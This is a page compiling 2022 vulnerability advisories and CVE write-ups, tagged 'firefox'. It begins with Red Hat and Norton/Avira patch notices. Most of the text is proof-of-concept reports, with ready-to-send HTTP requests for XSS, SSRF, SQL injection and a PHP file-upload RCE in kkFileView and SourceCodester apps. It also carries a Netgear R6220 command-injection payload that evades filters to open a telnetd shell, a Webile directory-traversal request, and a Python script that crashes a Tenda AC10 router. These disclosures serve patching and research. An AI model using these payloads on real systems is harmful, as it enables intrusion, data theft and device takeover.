An update for firefox is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-40674: expat: a use-after-free in the doContent function in xmlparse.c


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-10-18

Updated:

2022-10-18

**RHSA-2022:6997 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: firefox security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for firefox is now available for Red Hat Enterprise Linux 7.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.  

This update upgrades Firefox to version 102.3.0 ESR.  

Security Fix(es):  

*   expat: a use-after-free in the doContent function in xmlparse.c (CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to take effect.

**Affected Products**

*   Red Hat Enterprise Linux Server 7 x86\_64
*   Red Hat Enterprise Linux Workstation 7 x86\_64
*   Red Hat Enterprise Linux Desktop 7 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 7 s390x
*   Red Hat Enterprise Linux for Power, big endian 7 ppc64
*   Red Hat Enterprise Linux for Power, little endian 7 ppc64le

**Fixes**

*   BZ - 2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

**Red Hat Enterprise Linux Server 7**

SRPM

firefox-102.3.0-7.el7\_9.src.rpm

SHA-256: a4b59a2f4a4d4734dd3260afb1ec670c14fc06b25f01eaedd0159517c3736d04

x86\_64

firefox-102.3.0-7.el7\_9.i686.rpm

SHA-256: 4db3d6b4bca2419b68471f05b71e0f39559274176ffdb634d2e34e80b6cf29a3

firefox-102.3.0-7.el7\_9.x86\_64.rpm

SHA-256: 98a9ef4bfd5b1b0b00483fcdddc2547ae064ffabbdc6597448b03754eb5ca899

firefox-debuginfo-102.3.0-7.el7\_9.i686.rpm

SHA-256: 66fc95633e2c055a4a61b13af9267a8f079d570bed3c7e4ea69109e476d26712

firefox-debuginfo-102.3.0-7.el7\_9.x86\_64.rpm

SHA-256: 61d4a321e007e7baa3722e77caa8e7e7eab1e7059b5cbc8135379bf88e155c1f

**Red Hat Enterprise Linux Workstation 7**

SRPM

firefox-102.3.0-7.el7\_9.src.rpm

SHA-256: a4b59a2f4a4d4734dd3260afb1ec670c14fc06b25f01eaedd0159517c3736d04

x86\_64

firefox-102.3.0-7.el7\_9.i686.rpm

SHA-256: 4db3d6b4bca2419b68471f05b71e0f39559274176ffdb634d2e34e80b6cf29a3

firefox-102.3.0-7.el7\_9.x86\_64.rpm

SHA-256: 98a9ef4bfd5b1b0b00483fcdddc2547ae064ffabbdc6597448b03754eb5ca899

firefox-debuginfo-102.3.0-7.el7\_9.i686.rpm

SHA-256: 66fc95633e2c055a4a61b13af9267a8f079d570bed3c7e4ea69109e476d26712

firefox-debuginfo-102.3.0-7.el7\_9.x86\_64.rpm

SHA-256: 61d4a321e007e7baa3722e77caa8e7e7eab1e7059b5cbc8135379bf88e155c1f

**Red Hat Enterprise Linux Desktop 7**

SRPM

firefox-102.3.0-7.el7\_9.src.rpm

SHA-256: a4b59a2f4a4d4734dd3260afb1ec670c14fc06b25f01eaedd0159517c3736d04

x86\_64

firefox-102.3.0-7.el7\_9.i686.rpm

SHA-256: 4db3d6b4bca2419b68471f05b71e0f39559274176ffdb634d2e34e80b6cf29a3

firefox-102.3.0-7.el7\_9.x86\_64.rpm

SHA-256: 98a9ef4bfd5b1b0b00483fcdddc2547ae064ffabbdc6597448b03754eb5ca899

firefox-debuginfo-102.3.0-7.el7\_9.i686.rpm

SHA-256: 66fc95633e2c055a4a61b13af9267a8f079d570bed3c7e4ea69109e476d26712

firefox-debuginfo-102.3.0-7.el7\_9.x86\_64.rpm

SHA-256: 61d4a321e007e7baa3722e77caa8e7e7eab1e7059b5cbc8135379bf88e155c1f

**Red Hat Enterprise Linux for IBM z Systems 7**

SRPM

firefox-102.3.0-7.el7\_9.src.rpm

SHA-256: a4b59a2f4a4d4734dd3260afb1ec670c14fc06b25f01eaedd0159517c3736d04

s390x

firefox-102.3.0-7.el7\_9.s390x.rpm

SHA-256: 86380468af5cf5965d3ca7d3f6dabf34dccd70f58a09b890e844cbacf5c36600

firefox-debuginfo-102.3.0-7.el7\_9.s390x.rpm

SHA-256: 89a7f9fc31f3c6bc5d824ffcf72f980e169255f52643371588f53919515210d2

**Red Hat Enterprise Linux for Power, big endian 7**

SRPM

firefox-102.3.0-7.el7\_9.src.rpm

SHA-256: a4b59a2f4a4d4734dd3260afb1ec670c14fc06b25f01eaedd0159517c3736d04

ppc64

firefox-102.3.0-7.el7\_9.ppc64.rpm

SHA-256: 273c30a8e85ce10e47cf87158764fd8a8027d3f7704f1237e7105d6020d0ffd9

firefox-debuginfo-102.3.0-7.el7\_9.ppc64.rpm

SHA-256: d2e67ecae2d64cf3d802c04b53c843f7173e6e9cb24fa839e8a3f3baf590c815

**Red Hat Enterprise Linux for Power, little endian 7**

SRPM

firefox-102.3.0-7.el7\_9.src.rpm

SHA-256: a4b59a2f4a4d4734dd3260afb1ec670c14fc06b25f01eaedd0159517c3736d04

ppc64le

firefox-102.3.0-7.el7\_9.ppc64le.rpm

SHA-256: 0f06f355ad528774772aea08e0e423a9b0b3cbc6f3160cea38bd999404d40fa6

firefox-debuginfo-102.3.0-7.el7\_9.ppc64le.rpm

SHA-256: 365c981d2ae3b6f264a0836a033bf5c3d146087c350a3e56b57a104e6bb9fdcd

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:6997: Red Hat Security Advisory: firefox security update

kkFileView 4.0 is vulnerable to Cross Site Scripting (XSS) via controller\ Filecontroller.java.

Permalink

**KkFileView has XSS vulnerability**

After visiting the Web page, KKfileview project first selects the browse button to add relevant files, and then clicks the upload button. The added file is a JSP file containing malicious JS statements. The contents of the file are as follows:

<html\>
<title\>test ip</title\>
<body\>
<script\>
alert('x')
</script\>
</body\>
</html\>

The request packet is as follows

    POST /fileUpload HTTP/1.1
    Host: 192.168.17.168:8012
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------199653466720897274883663154374
    Content-Length: 322
    Origin: http://192.168.17.168:8012
    DNT: 1
    Connection: close
    Referer: http://192.168.17.168:8012/index
    
    -----------------------------199653466720897274883663154374
    Content-Disposition: form-data; name="file"; filename="x.jsp"
    Content-Type: application/octet-stream
    
    <html>
    <title>test ip</title>
    <body>
    <script>
    alert('x')
    </script>
    </body>
    </html>
    
    -----------------------------199653466720897274883663154374--
    

Then view the address of the uploaded file under the file name address demo/x.jsp

The file can be accessed directly by concatenating the URL, and the malicious JS file can be executed

View the server\ src \main\ Java \cn\keking\web\controller\ Filecontroller.java

The reasons for this vulnerability are as follows:

1.  The fileUpload method determines only the file name but not the contents of the file
2.  The file upload path is not authenticated

CVE-2022-42147: paper/xss_vul_en.md at main · xiaojiangxl/paper

Open Source SACCO Management System v1.0 is vulnerable to SQL Injection via /sacco_shield/manage_payment.php.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: XD201-MENG@QI

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/manage\_payment.php

Vulnerability location: /sacco\_shield/manage\_payment.php?id=, id

dbname = sacco,length=5

\[+\] Payload: /sacco\_shield/manage\_payment.php?id=2%20and%20length(database())%20=5--+ // Leak place ---> id

GET /sacco\_shield/manage\_payment.php?id\=2%20and%20length(database())%20\=5\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

length=5 

length=6

CVE-2022-42143: bug_report/SQLi-1.md at main · xd201qaz/bug_report

Online Tours & Travels Management System v1.0 is vulnerable to Arbitrary code execution via ip/tour/admin/operations/update_settings.php.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: XD201-MENG@QI

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

Vulnerability url: ip/tour/admin/operations/update\_settings.php

Loophole location: Online Tours & Travels management system's admin/settings.php file exists arbitrary file upload (RCE)

Request package for file upload:

POST /tour/admin/operations/update\_settings.php?id\=2 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/tour/admin/settings.php
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------248921847826758
Content-Length: 1288
\-----------------------------248921847826758
Content-Disposition: form-data; name="title"
Tours and Travels
\-----------------------------248921847826758
Content-Disposition: form-data; name="f\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img"
favi.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="logo\_image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img1"
logo\_by NB.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="login\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img2"
logo\_by NB.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="currency"
1
\-----------------------------248921847826758
Content-Disposition: form-data; name="footer"
Nikhil B
\-----------------------------248921847826758
Content-Disposition: form-data; name="update"
\-----------------------------248921847826758--

The files will be uploaded to this directory \\tour\\admin\\settings 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-42142: bug_report/RCE-1.md at main · xd201qaz/bug_report

A vulnerability within the Software Updater functionality of Avira Security for Windows allowed an attacker with write access to the filesystem, to escalate his privileges in certain scenarios. The issue was fixed with Avira Security version 1.1.72.30556.

NLOKSA1507

Software Updater of Avira Security for Windows vulnerable to Privilege Escalation

Advisory Status

CLOSED

Summary

NortonLifeLock has released an update to address an issue that was discovered in the software updater functionality of Avira Security.

Affected Products

"Avira Security" – for Windows; up to version 1.1.71.30554

Issues

**Mitigation**

Upgrade Avira Security for Windows to version 1.1.72.30556. This version was released on 15. August 2022 to all customers. All users received the update automatically and do not need to take any action.

**Acknowledgements**

Filip Dragovic

CVE-2022-3368

 

Severity/CVSSv3

High  
Score: 7.3  
Vector: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

References

Filip Dragovic

Impact

Privilege Escalation

Description

A vulnerability within the Software Updater functionality of Avira Security for Windows allowed an attacker with write access to the filesystem, to escalate his privileges in certain scenarios. The issue was fixed with Avira Security version 1.1.72.30556.

Additional Recommendations, if any:

We encourage customers to ensure their security software – as well as their tech devices – are always updated to the latest version available.

NLOKSA1506

Avira Password Manager-Browser Extensions vulnerable to Sensitive Data Leakage via Phishing

Advisory Status

CLOSED

Summary

NortonLifeLock has released an update to address an issue that was discovered in Avira Password Manager Browser Extension

Affected Products

Only the following software is affected:  

*   "Avira Password Manager" - extension for Chrome; version 2.18.4.3868
*   "Avira Password Manager" - extension for MS Edge; version 2.18.4.3847
*   "Avira Password Manager" - extension for Opera; version 2.18.4.3847
*   "Avira Password Manager" - extension for Firefox; version 2.18.4.38471
*   "Avira Password Manager" - extension for Safari; version 2.18.4

Issues

**Mitigation**

Upgrade extensions to following versions:

*   "Avira Password Manager" - extension for Chrome; version 2.18.5.3877
*   "Avira Password Manager" - extension for MS Edge; version 2.18.5.3877
*   "Avira Password Manager" - extension for Opera; version 2.18.5.3877
*   "Avira Password Manager" - extension for Firefox; version 2.18.5.38771
*   "Avira Password Manager" - extension for Safari; version 2.18.5 (3877)

Users who have not disabled auto-updates receive the updated versions automatically and do not need to take any action

**Acknowledgements**

Stiftung Warentest

CVE-2022-28795

 

Severity/CVSSv3

Critical  
Score: 9.6  
Vector: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

References

https://nvd.nist.gov/vuln/detail/CVE-2022-28795

Impact

Sensitive Data Leakage

Description

A vulnerability within the Avira Password Manager Browser Extensions provided a potential loophole where, if a user visited a page crafted by an attacker, the discovered vulnerability could trigger the Password Manager Extension to fill in the password field automatically. An attacker could then access this information via JavaScript. The issue was fixed with the browser extensions version 2.18.5 for Chrome, MS Edge, Opera, Firefox, and Safari.

Additional Recommendations, if any:

We encourage customers to ensure their security software - as well as their tech devices - are always updated to the latest version available. In addition, we encourage users to use two-factor (2FA) authentication as an additional layer of security.

CVE-2022-3368: Norton Security Advisories

kkFileView 4.0 is vulnerable to Server-side request forgery (SSRF) via controller\OnlinePreviewController.java.

Permalink

Cannot retrieve contributors at this time

**KkFileView has SSRF vulnerabilities**

The server provides the function of obtaining data from other server applications without filtering or restricting addresses and protocols.

Set up the test environment as shown below

Set up kkFileView service on Server1 server and start HTTP service on port 90 of Server2 host

Server2 host Settings do not allow direct access from PC1 hosts

By accessing server1 http://ip:prot/onlinPreview?url=

The Intranet request address to be probed is base64 encoded and used as the URL parameter value for this request

**Related Request packets**

    GET /onlinePreview?url=aHR0cDovLzE5Mi4xNjguMTcuMTUzOjkwL2luZGV4Lmh0bWw= HTTP/1.1
    Host: 192.168.17.128:8012
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    

The contents of the Server2 host can be detected in the response package

You can also see Server1 requesting it in Server2's Web services log

120/5000 Check the server\src\main\java\cn\keking\web\controller\OnlinePreviewController.java OnlinePreview function in Java Here is not to the incoming base64 content filtering operation

CVE-2022-42149: paper/ssrf_vul_en.md at main · xiaojiangxl/paper

Netgear R6220 v1.1.0.114_1.0.1 suffers from Incorrect Access Control, resulting in a command injection vulnerability.

**Information**

**Vendor of the products:**    Netgear

**Reported by:**    Chengjian(cj775995648@gmail.com) & HuoXingpeng(huoxingpeng@outlook.com) & ShaLetian(ltsha@njupt.edu.cn)

**Affected products:**    Netgear r6220 <= v1.1.0.114\_1.0.1

**Firmware download address:** https://www.downloads.netgear.com/files/GDC/R6220/R6220-V1.1.0.114.zip

** Vulnerability Description**

The vulnerability is detected at /usr/sbin/setup.cgi

The vulnerability point is located at the following location in sub_1AF88

The v4 here receives the remote_passcode parameter, which is first filtered by the test_command_inject function. Although a lot of characters are filtered out here, we can still use & for splice injection. The /bin/sh check can also be bypassed by constructs like /$9bin/$9sh, and telnetd can also be bypassed by constructs like telne''td.

After passing the inspection, the remote_passcode parameter is obtained directly through nvram_set, and then obtained and assigned to v7 through nvram_get, and finally passed into the COMMAND function for splicing and execution without checking.

This bypasses the check and implements command injection.

**POC**

After logging in to the page, command injection can be achieved by capturing packets through burpsuite and sending the following request.

POST /setup.cgi??id=7c534ca23308d480 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 345
Origin: http://192.168.1.1
Authorization: Basic YWRtaW46QWRtaW4x
Connection: close
Referer: http://192.168.1.1/USB\_media.htm&todo=cfg\_init
Cookie: sessionid=sid16174xxx73678xxx1962923992x
Upgrade-Insecure-Requests: 1

media\_server=&itunes\_server=&config\_passcode=&media\_server\_name=ReadyDLNA&scan=0&h\_media\_server=enable&h\_itunes\_server=enable&remote\_passcode=%26telne%27%27td+-l+%2F%249bin%2F%249sh+-p+5214+-b+0.0.0.0%26&h\_scan=0&todo=iserver\_allow\_ctrl&this\_file=USB\_media.htm&next\_file=USB\_media.htm

**Get Shell**

First, port 5214 is closed, and we directly test the connection through nc.

Then use burpsuite to capture packets and modify parameters, and submit.

Connect again, and successfully connect the terminal through port 5214.

CVE-2022-42221: CVE_Report/Netgear/R6220 at main · Cj775995/CVE_Report

Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Directory Traversal

Billing System Project v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /phpinventory/editbrand.php.

Permalink

**Billing System Project v1.0 by mayuri\_k has SQL injection**

BUG\_Author: AuriGe

Login account: mayurik/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /phpinventory/editbrand.php?id=

Vulnerability location: /phpinventory/editbrand.php?id=, id

dbname = store1,length=6

\[+\] Payload: /phpinventory/editbrand.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /phpinventory/editbrand.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-41498: bug_report/SQLi-1.md at main · aurigee/bug_report

Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetSpeedWan.

Permalink

**Tenda AC10V15.03.06.23 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2734.html
    

**Affected version**

**Vulnerability details**

/goform/SetSpeedWan，speed\_dir is controllable and will eventually be spliced into ret\_buf by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x300
p2 \= b'speed\_dir=' + p1

p3 \= b"POST /goform/SetSpeedWan" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

Tag

#firefox